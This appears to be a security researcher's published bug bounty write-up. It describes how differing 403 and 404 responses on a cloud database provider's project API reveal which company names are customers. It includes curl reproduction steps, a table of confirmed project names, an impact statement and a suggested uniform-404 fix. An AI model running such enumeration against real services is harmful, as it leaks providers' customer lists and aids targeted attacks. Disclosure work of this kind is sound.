180	<meta name="robots" content="index, follow, max-image-preview:large">
181	<meta property="og:type" content="article">
182	<meta property="og:site_name" content="Zion Boggan">
183	<meta property="og:title" content="Project Name Enumeration \| Zion Boggan">
184	<meta property="og:description" content="403 vs 404 oracle on `/v1/project/&lt;name&gt;` enumerates the entire managed-services customer base.">
185	<meta property="og:url" content="https://zionboggan.com/security-research-notebook/project-name-enumeration/">
186	<meta property="og:image" content="https://zionboggan.com/assets/og-default.png">
187	<meta name="twitter:card" content="summary_large_image">
188	<meta name="twitter:title" content="Project Name Enumeration \| Zion Boggan">
189	<meta name="twitter:description" content="403 vs 404 oracle on `/v1/project/&lt;name&gt;` enumerates the entire managed-services customer base.">
190	<meta name="twitter:image" content="https://zionboggan.com/assets/og-default.png">
191	<script type="application/ld+json">{"@context":"https://schema.org","@type":"TechArticle","headline":"Project Name Enumeration","description":"403 vs 404 oracle on `/v1/project/&lt;name&gt;` enumerates the entire managed-services customer base.","url":"https://zionboggan.com/security-research-notebook/project-name-enumeration/","image":"https://zionboggan.com/assets/og-default.png","author":{"@type":"Person","name":"Zion Boggan","url":"https://zionboggan.com"},"publisher":{"@type":"Person","name":"Zion Boggan"}}</script>
192	</head><body>
193	<nav><div class="wrap">
194	<a class="brand mono" href="/" style="color:var(--ink)">zion_boggan<span class="dot">.</span></a>
195	<span class="links"><a href="/#oversight">Oversight</a><a href="/#labs">Labs</a><a href="/#research">Research</a><a href="/security-research-notebook/">Notebook</a><a href="/">Home</a></span>
196	</div></nav>
197	<header class="hero detail-hero"><div class="wrap">
198	<a class="back" href="/security-research-notebook/">← Research notebook</a>
199	<div class="kicker">Info disclosure</div>
200	<h1>Project Name Enumeration</h1>
201	</div></header>
202	<section><div class="wrap"><div class="content">
203	<h1>SUBMISSION 1</h1>
204	<p>TITLE: Project Name Enumeration via 403/404 Response Differentiation Leaks Customer List</p>
205	<p>TARGET: api.aiven.io (https://api.aiven.io/login)</p>
206	<p>VRT CATEGORY: Server Security Misconfiguration > Information Disclosure</p>
207	<p>URL: https://api.aiven.io/v1/project/{project_name}</p>
208	<h2>DESCRIPTION:</h2>
209	<h2>Summary</h2>
210	<p>The <code>GET /v1/project/{project_name}</code> endpoint returns differentiated HTTP responses for existing vs non-existing projects, allowing any authenticated user to enumerate all project names on the Aiven platform. Since project names frequently match company or organization names, this directly reveals Aiven’s customer list.</p>
211	<ul>
212	<li>Existing project (not owned by requester): <strong>403</strong>, <code>"Not a project member"</code></li>
213	<li>Non-existing project: <strong>404</strong>, <code>"Project does not exist"</code></li>
214	</ul>
215	<h2>Steps to Reproduce</h2>
216	<ol>
217	<li>
218	<p>Authenticate to the Aiven API with any valid token.</p>
219	</li>
220	<li>
221	<p>Query existing project name:</p>
222	</li>
223	</ol>
224	<pre><code class="language-bash">curl -s https://api.aiven.io/v1/project/netflix \
225	-H "Authorization: aivenv1 <TOKEN>"
226	</code></pre>
227	<p><strong>Response (403):</strong></p>
228	<pre><code class="language-json">{"errors":[{"message":"Not a project member","status":403}]}
229	</code></pre>
230	<ol start="3">
231	<li>Query non-existing project name:</li>
232	</ol>
233	<pre><code class="language-bash">curl -s https://api.aiven.io/v1/project/doesnotexist12345xyz \
234	-H "Authorization: aivenv1 <TOKEN>"
235	</code></pre>
236	<p><strong>Response (404):</strong></p>
237	<pre><code class="language-json">{"errors":[{"message":"Project does not exist","status":404}]}
238	</code></pre>
239	<ol start="4">
240	<li>The 403/404 differentiation confirms whether a project name exists on the platform.</li>
241	</ol>
242	<h2>Confirmed Existing Projects</h2>
243	<table>
244	<thead>
245	<tr>
246	<th>Project Name</th>
247	<th>HTTP Status</th>
248	</tr>
249	</thead>
250	<tbody>
251	<tr>
252	<td><code>netflix</code></td>
253	<td>403 (exists)</td>
254	</tr>
255	<tr>
256	<td><code>spotify</code></td>
257	<td>403 (exists)</td>
258	</tr>
259	<tr>
260	<td><code>google</code></td>
261	<td>403 (exists)</td>
262	</tr>
263	<tr>
264	<td><code>facebook</code></td>
265	<td>403 (exists)</td>
266	</tr>
267	<tr>
268	<td><code>tesla</code></td>
269	<td>403 (exists)</td>
270	</tr>
271	<tr>
272	<td><code>databricks</code></td>
273	<td>403 (exists)</td>
274	</tr>
275	<tr>
276	<td><code>redis</code></td>
277	<td>403 (exists)</td>
278	</tr>
279	<tr>
280	<td><code>grafana</code></td>
281	<td>403 (exists)</td>
282	</tr>
283	<tr>
284	<td><code>production</code></td>
285	<td>403 (exists)</td>
286	</tr>
287	<tr>
288	<td><code>internal</code></td>
289	<td>403 (exists)</td>
290	</tr>
291	</tbody>
292	</table>
293	<p>Controls: <code>doesnotexist12345xyz</code>, <code>another-fake-project-abc</code> → 404.</p>
294	<h2>Impact</h2>
295	<p>An attacker can enumerate Aiven’s customer base by iterating company names against this endpoint. This reveals which organizations use Aiven for their database infrastructure, commercially sensitive information that enables competitive intelligence gathering and targeted supply chain attacks against confirmed Aiven customers.</p>
296	<h2>Suggested Fix</h2>
297	<p>Return a uniform <code>404 "Project does not exist"</code> for both non-existing projects and projects the requester doesn’t have access to.</p>
298	<hr><p style="color:var(--faint);font-size:12.5px;font-family:ui-monospace,Menlo,monospace">Source · github.com/zionboggan/security-research-notebook · writeups/aiven/project-name-enumeration.md</p>
299	</div></div></section>
300	<footer><div class="wrap row">
301	<div class="links"><a href="/">Portfolio</a><a href="https://www.linkedin.com/in/zion-boggan">LinkedIn</a><a href="/security-research-notebook/">Notebook</a><a href="mailto:zionboggan0@gmail.com">Email</a></div>
302	<div class="note">Coordinated-disclosure research. Findings appear here only after the program's disclosure window closed, the patch shipped, or a CVE was published. No customer data was accessed.</div>
303	</div></footer>
304	</body></html>